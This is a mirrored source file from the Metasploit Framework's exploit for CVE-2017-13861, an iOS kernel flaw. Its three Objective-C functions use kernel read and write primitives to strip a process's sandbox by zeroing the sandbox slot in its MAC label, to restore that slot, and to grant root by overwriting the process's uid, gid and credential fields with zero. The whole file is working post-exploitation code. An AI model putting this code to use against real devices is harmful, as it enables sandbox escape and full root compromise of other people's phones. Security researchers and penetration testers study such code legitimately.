CoCalc -- sandbox.m

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2017-13861/sandbox.m
Views: ¹¹⁷⁸⁰

1

2
#include "kernel_utils.h"
3
#include "offsetof.h"
4

5
#import <Foundation/Foundation.h>
6
#define LOG(str, args...) do { NSLog(@"[*] " str "\n", ##args); } while(0)
7

8
uint64_t unsandbox(pid_t pid) {
9
    if (!pid) return -1;
10
    
11
    LOG("[*] Unsandboxing pid %d\n", pid);
12
    
13
    uint64_t proc = proc_of_pid(pid); // pid's proccess structure on the kernel
14
    uint64_t ucred = KernelRead_64bits(proc + off_p_ucred); // pid credentials
15
    uint64_t cr_label = KernelRead_64bits(ucred + off_ucred_cr_label); // MAC label
16
    uint64_t orig_sb = KernelRead_64bits(cr_label + off_sandbox_slot);
17
    
18
    KernelWrite_64bits(cr_label + off_sandbox_slot /* First slot is AMFI's. so, this is second? */, 0); //get rid of sandbox by nullifying it
19
    
20
    return (KernelRead_64bits(KernelRead_64bits(ucred + off_ucred_cr_label) + off_sandbox_slot) == 0) ? orig_sb : -1;
21
}
22

23
int sandbox(pid_t pid, uint64_t sb) {
24
    if (!pid) return -1;
25
    
26
    LOG("[*] Sandboxing pid %d with slot at 0x%llx\n", pid, sb);
27
    
28
    uint64_t proc = proc_of_pid(pid); // pid's proccess structure on the kernel
29
    uint64_t ucred = KernelRead_64bits(proc + off_p_ucred); // pid credentials
30
    uint64_t cr_label = KernelRead_64bits(ucred + off_ucred_cr_label /* MAC label */);
31
    KernelWrite_64bits(cr_label + off_sandbox_slot /* First slot is AMFI's. so, this is second? */, sb);
32
    
33
    return (KernelRead_64bits(KernelRead_64bits(ucred + off_ucred_cr_label) + off_sandbox_slot) == sb) ? 0 : -1;
34
}
35

36
int rootify(pid_t pid) {
37
    if (!pid) return -1;
38
    
39
    uint64_t proc = proc_of_pid(pid);
40
    uint64_t ucred = KernelRead_64bits(proc + off_p_ucred);
41
    //make everything 0 without setuid(0), pretty straightforward.
42
    KernelWrite_32bits(proc + off_p_uid, 0);
43
    KernelWrite_32bits(proc + off_p_ruid, 0);
44
    KernelWrite_32bits(proc + off_p_gid, 0);
45
    KernelWrite_32bits(proc + off_p_rgid, 0);
46
    KernelWrite_32bits(ucred + off_ucred_cr_uid, 0);
47
    KernelWrite_32bits(ucred + off_ucred_cr_ruid, 0);
48
    KernelWrite_32bits(ucred + off_ucred_cr_svuid, 0);
49
    KernelWrite_32bits(ucred + off_ucred_cr_ngroups, 1);
50
    KernelWrite_32bits(ucred + off_ucred_cr_groups, 0);
51
    KernelWrite_32bits(ucred + off_ucred_cr_rgid, 0);
52
    KernelWrite_32bits(ucred + off_ucred_cr_svgid, 0);
53
    
54
    return (KernelRead_32bits(proc + off_p_uid) == 0) ? 0 : -1;
55
}
56

57

58

59

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place.

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.